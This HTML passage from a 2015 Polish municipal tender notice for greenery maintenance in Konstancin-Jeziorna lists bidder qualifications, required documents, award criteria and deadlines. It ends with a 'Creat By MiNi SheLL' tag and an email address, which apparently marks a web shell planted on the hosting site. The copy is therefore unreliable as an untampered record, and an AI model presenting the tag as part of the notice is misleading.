<ul class="kh_indent_1"><li><p>Wykonawcy złożą oświadczenie o spełnieniu warunków udziału w postępowaniu określonych przepisami art. 22 ust. 1 ustawy Pzp (załącznik nr 3). Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował na czas realizacji zamówienia minimum 2 samochodami przystosowanymi do transportu powstałego urobku i 1 wózkiem widłowym do 1 tony udźwigu - do przewozu konstrukcji kwiatowych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy złożą oświadczenie o spełnieniu warunków udziału w postępowaniu określonych przepisami art. 22 ust. 1 ustawy Pzp (załącznik nr 3).

Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował na czas realizacji zamówienia, osobami, które będą uczestniczyć w wykonywaniu zamówienia posiadającymi odpowiednie kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonywania zamówienia: - kierownik prac ogrodniczych, posiadający wykształcenie wyższe w zakresie urządzania i pielęgnacji zieleni, lub uprawnienia Inspektora Nadzoru Terenów Zieleni oraz co najmniej 12 miesięczną praktykę zawodową przy urządzaniu i utrzymywaniu terenów zieleni, 
- minimum 12 osób [2 grupy po 6 osób], które będą bezpośrednio realizować prace i posiadające co najmniej 12 miesięczną praktykę zawodową przy pielęgnacji zieleni,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy złożą oświadczenie o spełnieniu warunków udziału 
w postępowaniu określonych przepisami art. 22 ust. 1 ustawy Pzp (załącznik nr 3). 

Zamawiający odstępuje od opisania sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz ofertowy - załącznik nr 1.
2.	Wypełniony formularz dotyczący podwykonawców - załącznik nr 2.
3.	Jeżeli uprawnienia do reprezentacji osób podpisujących ofertę nie wynikają 
z załączonego dokumentu wyszczególnionego w ust. 6 poniżej, do oferty należy załączyć, np. pełnomocnictwo w oryginale lub kopii poświadczonej notarialnie.
4.	Oświadczenie o spełnieniu warunków udziału w postępowaniu określonych przepisami art. 22 ust. 1 ustawy Pzp - załącznik nr 3.
5.	Oświadczenie o braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp - załączniki nr 4.
6. Kopię dokumentu potwierdzającego wniesienie wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - termin płatności - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Pzp przewiduje zmianę postanowień zawartej umowy w stosunku do treści oferty w zakresie:
1) kierownika robót ogrodniczych pod warunkiem spełnienia wymagań określonych w rozdziale X SIWZ,
2)	zmiany podwykonawców, zgodnie z zasadami przewidzianymi w Kodeksie cywilnym,
3)	wszelkich zmian, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
4)	osób prowadzących nadzór nad realizacją umowy ze strony Zamawiającego,
5) 	zmiany terminu realizacji umowy, w przypadku wystąpienia okoliczności których nie dało się przewidzieć, zmiana jest korzystna dla Zamawiającego lub uzasadniona jego potrzebami,
6) przesunięcia terminów realizacji poszczególnych robót określonych w zadaniach, podyktowanych bieżącymi potrzebami pielęgnacyjnymi czy nieprzewidywalnymi warunkami atmosferycznymi (np. długotrwała susza), w tym wypadku Zamawiający powiadomi Wykonawcę o zaistniałej zmianie, ustalając kolejny termin realizacji,
7)	 zmiany obsługiwanej powierzchni terenu jak również ilości lub krotności prac, w tym zmniejszenia o 40% ogólnej wartości przedmiotu umowy, podyktowanych nieprzewidzianymi okolicznościami oraz bieżącymi potrzebami (np. realizacja robót drogowych, budowlanych)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.konstancinjeziorna.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Konstancin-Jeziorna, ul. Warszawska 23, 05-520 Konstancin-Jeziorna, Biuro Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2015 godzina 10:00, miejsce: Urząd Miasta i Gminy Konstancin-Jeziorna, ul. Warszawska 32, 05-520 Konstancin-Jeziorna, pok. nr 4 - kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com